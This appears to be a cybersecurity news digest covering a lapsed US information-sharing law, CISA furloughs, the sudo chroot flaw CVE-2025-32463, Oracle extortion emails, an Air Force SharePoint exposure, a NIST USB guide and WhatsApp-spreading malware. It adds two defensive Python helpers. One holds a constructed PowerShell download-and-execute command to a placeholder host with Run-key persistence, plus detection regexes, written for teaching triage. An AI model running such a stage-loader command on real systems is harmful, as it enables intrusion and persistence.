Top stories.
- The Cybersecurity Information Sharing Act lapses without reauthorization.
- CISA's workforce is furloughed amidst the government shutdown.
- CISA issues urgent warning about sudo vulnerability.
- Oracle customers targeted by extortion campaign.
- US Air Force investigating a SharePoint breach.
- NIST publishes new guide for managing USB threats.
- Malware campaign targets WhatsApp.
Cyber information-sharing law and state grants go dark.
Two significant federal cybersecurity programs expired Wednesday morning after Congress remained deadlocked over government funding. Both the Cybersecurity Information Sharing Act of 2015, which gives companies liability protection when they share cyber threat indicators with the government and with one another, and the $1 billion State and Local Cybersecurity Grant Program lapsed without reauthorization.
The House of Representatives advanced renewal bills earlier this month, but gridlock in the Senate stalled them. Former CISA deputy director Nitin Natarajan said both programs are critical for resilience, particularly for smaller jurisdictions, and warned that threat sharing and cyber defense will diminish without them.
CISA's workforce is furloughed due to government shutdown.
The US Cybersecurity and Infrastructure Security Agency (CISA) has furloughed most of its workforce because of the ongoing government shutdown. Roughly 35% of staff remain on duty, and more can be recalled in an emergency. Experts worry that the timing could hamper efforts against ransomware and Chinese state-linked hacking campaigns.
Agency spokeswoman, Marci McCarthy, wrote that "while a government shutdown can disrupt federal operations, CISA will sustain essential functions and provide timely guidance to minimize disruptions."
CISA issues an urgent warning about active exploitation of a critical sudo vulnerability.
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about active exploitation of a critical vulnerability in the sudo utility. The flaw, tracked as CVE-2025-32463, lies in sudo's -R (--chroot) option: while resolving user and group names, sudo consulted configuration inside the caller-chosen chroot directory, so an unprivileged local user, including one with no sudoers entry at all, can make the root-privileged process load an attacker-supplied shared library and gain full root access. Upstream sudo 1.9.14 through 1.9.17 are affected; 1.9.17p1 fixed the issue, and the legacy 1.8 series never shipped the option.
CISA warned that successful exploitation could result in complete system compromise, enabling data theft, service disruption or malware installation. It urged administrators to identify vulnerable systems and apply vendor patches, or to stop relying on the chroot option where patching is not yet possible.
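The check below is an added triage helper, not code from the article, CISA or the sudo project. It parses the version string that `sudo -V` prints, compares it against the affected upstream range, and greps the sudoers files for `CHROOT=` rules or the `runchroot` default so you know whether anything actually depends on the feature before you remove it. The sample sudoers lines and version strings in the test are constructed.

```python
"""Triage helper for CVE-2025-32463 exposure (sudo chroot), added here as an illustration.

Affected upstream releases: sudo 1.9.14 through 1.9.17 inclusive; fixed in 1.9.17p1.
Legacy 1.8.x never shipped the chroot option. Distribution packages may carry a
backported fix without changing the upstream version string, so treat a "vulnerable"
verdict as "check your distro advisory", not as proof.
"""
import re
import shutil
import subprocess
from pathlib import Path
from typing import Iterable, List, Optional, Tuple

# Matches upstream version strings such as 1.9.15p5 or 1.9.17; "pN" is the patch level.
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:p(\d+))?$")
FIRST_AFFECTED = (1, 9, 14, 0)
LAST_AFFECTED = (1, 9, 17, 0)   # 1.9.17p1 is the first fixed release


def parse_version(version: str) -> Optional[Tuple[int, int, int, int]]:
    """Turn '1.9.15p5' into (1, 9, 15, 5); a missing pN counts as patch level 0."""
    m = VERSION_RE.match(version.strip())
    if not m:
        return None
    major, minor, micro, patch = m.groups()
    return int(major), int(minor), int(micro), int(patch or 0)


def is_vulnerable(version: str) -> bool:
    """True when the upstream version falls inside the affected range."""
    parsed = parse_version(version)
    if parsed is None:
        raise ValueError(f"unrecognised sudo version string: {version!r}")
    return FIRST_AFFECTED <= parsed <= LAST_AFFECTED


def version_from_sudo_output(text: str) -> Optional[str]:
    """Extract the version from `sudo -V`, whose first line reads 'Sudo version 1.9.15p5'."""
    m = re.search(r"^Sudo version (\S+)", text, re.MULTILINE)
    return m.group(1) if m else None


# CHROOT= on a rule or the runchroot default means something relies on the feature.
CHROOT_RE = re.compile(r"\bCHROOT=|\brunchroot\b")


def sudoers_chroot_refs(lines: Iterable[str]) -> List[str]:
    """Return non-comment sudoers lines that reference the chroot feature."""
    return [
        line.rstrip("\n")
        for line in lines
        if not line.lstrip().startswith("#") and CHROOT_RE.search(line)
    ]


def main() -> None:
    sudo = shutil.which("sudo")
    if sudo is None:
        print("sudo not installed; nothing to check")
        return
    out = subprocess.run([sudo, "-V"], capture_output=True, text=True, check=False).stdout
    version = version_from_sudo_output(out)
    if version is None:
        print("could not parse `sudo -V` output")
    elif is_vulnerable(version):
        print(f"sudo {version}: inside the CVE-2025-32463 range; upgrade to 1.9.17p1 or a patched distro build")
    else:
        print(f"sudo {version}: outside the affected upstream range")

    # Reading sudoers normally needs root; unreadable files are reported, not fatal.
    for path in [Path("/etc/sudoers"), *sorted(Path("/etc/sudoers.d").glob("*"))]:
        try:
            refs = sudoers_chroot_refs(path.read_text().splitlines(keepends=True))
        except OSError as exc:
            print(f"{path}: not readable ({exc.strerror})")
            continue
        for ref in refs:
            print(f"{path}: chroot in use -> {ref}")


if __name__ == "__main__":
    main()
```

Two caveats when reading the output. The version comparison is the real exposure indicator; an empty sudoers grep does not mean you are safe, because the bug is reachable by any local user regardless of what sudoers grants. And because distributions backport fixes without bumping the upstream version, a "vulnerable" verdict on a packaged sudo should be confirmed against the distro's own advisory or package changelog.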
Large-scale extortion campaign targets Oracle customers.
Google has warned of a large-scale extortion campaign targeting Oracle customers. The emails are going both to executives at large organizations and to their IT departments, and demand ransoms reported to reach $50 million in exchange for not leaking the allegedly stolen data. Google said the messages were sent to "executives at numerous organizations claiming to have stolen sensitive data from their Oracle E-Business Suite."
Oracle is investigating and says the attackers do not appear to be exploiting any zero-days. The company said in a statement: "Oracle is aware that some Oracle E-Business Suite (EBS) customers have received extortion emails. Our ongoing investigation has found the potential use of previously identified vulnerabilities that are addressed in the July 2025 Critical Patch Update. Oracle reaffirms its strong recommendation that customers apply the latest Critical Patch Updates."
US Air Force investigates SharePoint breach.
The US Air Force confirmed it is investigating a "privacy-related" issue after a permissions problem on Air Force SharePoint sites exposed sensitive data. A breach notice warned that all Air Force SharePoint sites would be blocked for two weeks. The notice stated:
"This message is to inform you of a critical Personally Identifiable Information (PII) and Protected Health Information (PHI) exposure related to USAF SharePoint Permissions. As a result of this breach, all USAF SharePoints will be blocked Air Force-wide to protect sensitive information."
It is unclear what, if any, services are offline at the moment; neither the Air Force nor Microsoft has confirmed any disruptions.
NIST publishes new guide for protecting ICS against USB-borne threats.
The National Institute of Standards and Technology (NIST) has published Special Publication 1334, a concise guide to managing cybersecurity risk from removable media in operational technology (OT) environments. It singles out USB flash drives as both a valuable tool and a major threat.
The two-page guide covers procedural, physical, technical and transportation controls: strict usage policies, secure storage, malware scanning and data sanitization. NIST warns that "if a USB device is infected with malware, it can spread to the industrial control system and cause problems, such as disrupting operations or compromising safety."
WhatsApp targeted by fast-spreading malware campaign.
A fast-spreading malware campaign is using WhatsApp as both lure and launchpad. First observed in September 2025, the self-propagating malware, known as SORVEPOTEL, spreads through phishing messages carrying ZIP attachments disguised as receipts or budget documents.
Once the archive is opened, a Windows shortcut (.LNK) inside it executes an encoded PowerShell command that fetches further payloads, establishes persistence and contacts attacker-controlled domains. The malware then hijacks the victim's active WhatsApp session and sends copies of itself to every contact and group.
Analysts also noted that similar ZIPs are being distributed via phishing emails that appear to come from legitimate institutions.
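The shortcut-to-encoded-PowerShell step described above is what a defender can catch in process-creation telemetry (Sysmon event 1, Windows 4688 with command-line auditing, or EDR). The script below is an added example, not code from the article or from the SORVEPOTEL reporting: it assumes the common `powershell.exe -EncodedCommand` form, decodes the UTF-16LE/Base64 body, and flags the behaviours the article lists (download cradle, in-memory execution, persistence). The command line it analyses is constructed for this example; the hostname, paths and registry value name are placeholders, not real indicators.

```python
"""Decode and triage a PowerShell -EncodedCommand launch, added here as an illustration.

The sample command line below is constructed for this example: the hostname, paths and
registry value name are placeholders, not indicators from the SORVEPOTEL reporting.
"""
import base64
import json
import re
from typing import Dict, List, Optional

# Constructed stage-one body: download cradle, in-memory execution, Run-key persistence.
SAMPLE_BODY = (
    "IEX (New-Object Net.WebClient).DownloadString('http://cdn.example.invalid/stage2.ps1');"
    "Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
    "-Name Updater -Value 'powershell -w hidden -File C:\\Users\\Public\\u.ps1'"
)


def encode_command(script: str) -> str:
    """Encode as powershell.exe -EncodedCommand expects: UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# The kind of command line an LNK lure hands to the shell: hidden window, no profile,
# execution policy bypassed, and the real script hidden behind -enc.
SAMPLE_CMDLINE = "powershell.exe -w hidden -nop -ep bypass -enc " + encode_command(SAMPLE_BODY)


def is_encoded_flag(token: str) -> bool:
    """-EncodedCommand may be abbreviated (-e, -ec, -enc, ...); match any accepted form."""
    if not token.startswith("-"):
        return False
    name = token[1:].lower()
    return name in ("e", "ec") or (len(name) >= 3 and "encodedcommand".startswith(name))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    tokens = cmdline.split()
    for i, token in enumerate(tokens[:-1]):
        if is_encoded_flag(token):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:          # binascii.Error is a ValueError: not base64
                return None
            return raw.decode("utf-16le", errors="replace")
    return None


# Behaviours worth flagging in the decoded body; each regex names one tactic.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "download cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod"
        r"|Net\.WebClient|Start-BitsTransfer",
        re.IGNORECASE),
    "in-memory execution": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "run-key persistence": re.compile(r"CurrentVersion\\Run\b", re.IGNORECASE),
    "scheduled task": re.compile(r"\bschtasks\b|Register-ScheduledTask", re.IGNORECASE),
}

# Launch options that hide the window or disable safety rails on the outer command line.
LAUNCH_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-noni\b|-noninteractive\b"
    r"|-e(?:p|xecutionpolicy)\s+bypass",
    re.IGNORECASE)


def analyze(cmdline: str) -> Dict[str, object]:
    """Decode one process-creation command line and report what the body would do."""
    decoded = decode_encoded_command(cmdline)
    findings: List[str] = sorted(
        name for name, rx in INDICATORS.items() if decoded is not None and rx.search(decoded))
    launch = sorted({m.group(0).lower() for m in LAUNCH_FLAGS.finditer(cmdline)})
    return {
        "decoded": decoded,
        "findings": findings,
        "launch_flags": launch,
        "suspicious": bool(findings),   # an encoded body that downloads, executes or persists
    }


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_CMDLINE), indent=2))
```

Run it over the `CommandLine` field of each PowerShell process-creation event rather than alerting on `-EncodedCommand` alone, which is also used by legitimate management tooling; the decoded body is what separates a download-and-persist stage loader from a benign encoded `Get-Date`. Script Block Logging (event 4104) gives the same decoded content on the endpoint if it is enabled, but process telemetry is often all that is available after the fact.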